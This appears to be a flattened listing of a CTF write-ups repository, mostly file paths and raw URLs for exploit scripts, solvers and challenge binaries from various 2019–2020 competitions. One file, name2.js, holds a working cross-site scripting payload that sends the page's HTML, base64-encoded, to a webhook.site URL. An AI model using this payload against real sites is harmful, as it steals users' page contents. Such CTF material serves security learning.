https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/warmup/executing.png -------------------------------------------------------------------------------- /Securinets-CTF-QUALS-2019/RE/warmup/solver.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-CTF-QUALS-2019/RE/warmup/solver.py -------------------------------------------------------------------------------- /Securinets-MINICTF-2019/README.md: -------------------------------------------------------------------------------- 1 | # Securinets MINI CTF 2019 pwn and reversing solutions 2 | -------------------------------------------------------------------------------- /Securinets-MINICTF-2019/pwn/indianstyle/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-MINICTF-2019/pwn/indianstyle/sploit.py -------------------------------------------------------------------------------- /Securinets-MINICTF-2019/pwn/indianstyle/task: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-MINICTF-2019/pwn/indianstyle/task -------------------------------------------------------------------------------- /Securinets-MINICTF-2019/pwn/onestepahead/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-MINICTF-2019/pwn/onestepahead/sploit.py -------------------------------------------------------------------------------- /Securinets-MINICTF-2019/pwn/onestepahead/task: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-MINICTF-2019/pwn/onestepahead/task -------------------------------------------------------------------------------- /Securinets-MINICTF-2019/pwn/shellhunter/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-MINICTF-2019/pwn/shellhunter/sploit.py -------------------------------------------------------------------------------- /Securinets-MINICTF-2019/pwn/shellhunter/tas: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-MINICTF-2019/pwn/shellhunter/tas -------------------------------------------------------------------------------- /Securinets-MINICTF-2019/pwn/winner/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-MINICTF-2019/pwn/winner/sploit.py -------------------------------------------------------------------------------- /Securinets-MINICTF-2019/pwn/winner/task: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-MINICTF-2019/pwn/winner/task -------------------------------------------------------------------------------- /Securinets-MINICTF-2019/pwn/winner_revenge/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-MINICTF-2019/pwn/winner_revenge/sploit.py -------------------------------------------------------------------------------- /Securinets-MINICTF-2019/pwn/winner_revenge/task: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-MINICTF-2019/pwn/winner_revenge/task -------------------------------------------------------------------------------- /Securinets-MINICTF-2019/rev/basicsagain/sol.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-MINICTF-2019/rev/basicsagain/sol.py -------------------------------------------------------------------------------- /Securinets-MINICTF-2019/rev/basicsagain/task: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-MINICTF-2019/rev/basicsagain/task -------------------------------------------------------------------------------- /Securinets-MINICTF-2019/rev/mennawmenghadi/solv.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-MINICTF-2019/rev/mennawmenghadi/solv.py -------------------------------------------------------------------------------- /Securinets-MINICTF-2019/rev/mennawmenghadi/task: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-MINICTF-2019/rev/mennawmenghadi/task -------------------------------------------------------------------------------- /Securinets-MINICTF-2019/rev/thepowerofchange/sol.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-MINICTF-2019/rev/thepowerofchange/sol.py -------------------------------------------------------------------------------- /Securinets-MINICTF-2019/rev/thepowerofchange/task: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-MINICTF-2019/rev/thepowerofchange/task -------------------------------------------------------------------------------- /Securinets-MINICTF-2019/rev/youcantseeme/sol.txt: -------------------------------------------------------------------------------- 1 | strings task |grep sec 2 | -------------------------------------------------------------------------------- /Securinets-MINICTF-2019/rev/youcantseeme/task: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-MINICTF-2019/rev/youcantseeme/task -------------------------------------------------------------------------------- /Securinets-MINICTF-2019/rev/youcantseemerevenge/bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-MINICTF-2019/rev/youcantseemerevenge/bin -------------------------------------------------------------------------------- /Securinets-MINICTF-2019/rev/youcantseemerevenge/sol.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/Securinets-MINICTF-2019/rev/youcantseemerevenge/sol.png -------------------------------------------------------------------------------- /SuSeC CTF 2020/pwn/unary/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/SuSeC CTF 2020/pwn/unary/sploit.py -------------------------------------------------------------------------------- /TG:HACK 2020/pwn/The Biohacker's Herbarium Service/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/TG:HACK 2020/pwn/The Biohacker's Herbarium Service/sploit.py -------------------------------------------------------------------------------- /TG:HACK 2020/pwn/useless crap/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/TG:HACK 2020/pwn/useless crap/sploit.py -------------------------------------------------------------------------------- /UTCTF 2020/PWN/zurk/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/UTCTF 2020/PWN/zurk/README.md -------------------------------------------------------------------------------- /UTCTF 2020/PWN/zurk/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/UTCTF 2020/PWN/zurk/sploit.py -------------------------------------------------------------------------------- /VirSecCon CTF/binary exploitation/Shopping list/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/VirSecCon CTF/binary exploitation/Shopping list/sploit.py -------------------------------------------------------------------------------- /VirSecCon CTF/binary exploitation/seed spring/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/VirSecCon CTF/binary exploitation/seed spring/sploit.py -------------------------------------------------------------------------------- /VirSecCon CTF/binary exploitation/seed spring/task: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/VirSecCon CTF/binary exploitation/seed spring/task -------------------------------------------------------------------------------- /VirSecCon CTF/binary exploitation/seed spring/task.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/VirSecCon CTF/binary exploitation/seed spring/task.c -------------------------------------------------------------------------------- /X-MAS CTF 2019/Eggnog/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/X-MAS CTF 2019/Eggnog/README.md -------------------------------------------------------------------------------- /X-MAS CTF 2019/Eggnog/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/X-MAS CTF 2019/Eggnog/sploit.py -------------------------------------------------------------------------------- /X-MAS CTF 2019/SN0WVERFL0W/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/X-MAS CTF 2019/SN0WVERFL0W/README.md -------------------------------------------------------------------------------- /X-MAS CTF 2019/SN0WVERFL0W/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/X-MAS CTF 2019/SN0WVERFL0W/sploit.py -------------------------------------------------------------------------------- /X-MAS CTF 2019/The Elf Postmaster/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/X-MAS CTF 2019/The Elf Postmaster/README.md -------------------------------------------------------------------------------- /X-MAS CTF 2019/The Elf Postmaster/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/X-MAS CTF 2019/The Elf Postmaster/sploit.py -------------------------------------------------------------------------------- /X-MAS CTF 2019/The Weather/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/X-MAS CTF 2019/The Weather/README.md -------------------------------------------------------------------------------- /X-MAS CTF 2019/The Weather/sploit.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/X-MAS CTF 2019/The Weather/sploit.py -------------------------------------------------------------------------------- /X-MAS-ctf/Endless Christmas/exec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/X-MAS-ctf/Endless Christmas/exec.png -------------------------------------------------------------------------------- /X-MAS-ctf/Endless Christmas/grep.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/X-MAS-ctf/Endless Christmas/grep.png -------------------------------------------------------------------------------- /X-MAS-ctf/Endless Christmas/ls.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/X-MAS-ctf/Endless Christmas/ls.png -------------------------------------------------------------------------------- /X-MAS-ctf/Endless Christmas/main.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/X-MAS-ctf/Endless Christmas/main.png -------------------------------------------------------------------------------- /X-MAS-ctf/Endless Christmas/mainfile.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/X-MAS-ctf/Endless Christmas/mainfile.png -------------------------------------------------------------------------------- /X-MAS-ctf/Endless Christmas/strings.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/X-MAS-ctf/Endless Christmas/strings.png -------------------------------------------------------------------------------- /X-MAS-ctf/Endless Christmas/task.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/X-MAS-ctf/Endless Christmas/task.png -------------------------------------------------------------------------------- /X-MAS-ctf/Endless Christmas/writeup.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/X-MAS-ctf/Endless Christmas/writeup.md -------------------------------------------------------------------------------- /_config.yml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/_config.yml -------------------------------------------------------------------------------- /kek.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/kek.js -------------------------------------------------------------------------------- /name.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/name.js -------------------------------------------------------------------------------- /name1.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/name1.js -------------------------------------------------------------------------------- /name2.js: -------------------------------------------------------------------------------- 1 | location.href="https://webhook.site/d1012675-90f2-4b0d-af21-c07665355e89?s="+btoa(document.body.innerHTML); 2 | -------------------------------------------------------------------------------- /stager.ps1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/stager.ps1 -------------------------------------------------------------------------------- /tara.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/tara.js -------------------------------------------------------------------------------- /ångstromCTF 2020/crypto/One Time Bad/solver.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KEERRO/ctf-writeups/HEAD/ångstromCTF 2020/crypto/One Time Bad/solver.py --------------------------------------------------------------------------------